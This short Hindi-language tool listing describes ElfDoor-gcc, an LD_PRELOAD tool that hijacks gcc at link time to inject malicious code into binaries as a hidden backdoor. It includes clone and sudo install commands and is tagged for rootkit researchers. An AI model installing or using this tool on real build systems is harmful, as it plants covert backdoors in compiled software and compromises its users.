
LD_PRELOAD-आधारित टूल जो बाइनरीज़ को लिंक करते समय gcc को हाईजैक करके मैलिशियस कोड इंजेक्ट करता है, जिससे स्रोत कोड में बदलाव किए बिना छिपी बैकडोर तैनाती संभव होती है।
ElfDoor-gcc एक LD_PRELOAD है जो gcc को हाईजैक करता है ताकि लिंकिंग के दौरान बाइनरी में दुर्भावनापूर्ण कोड इंजेक्ट किया जा सके, बिना स्रोत कोड को छुए।
विस्तृत लेख: https://matheuzsecurity.github.io/hacking/gcc/
git clone https://github.com/MatheuZSecurity/ElfDoor-gcc
cd ElfDoor-gcc
chmod +x install.sh
sudo ./install.sh
रूटकिट शोधकर्ता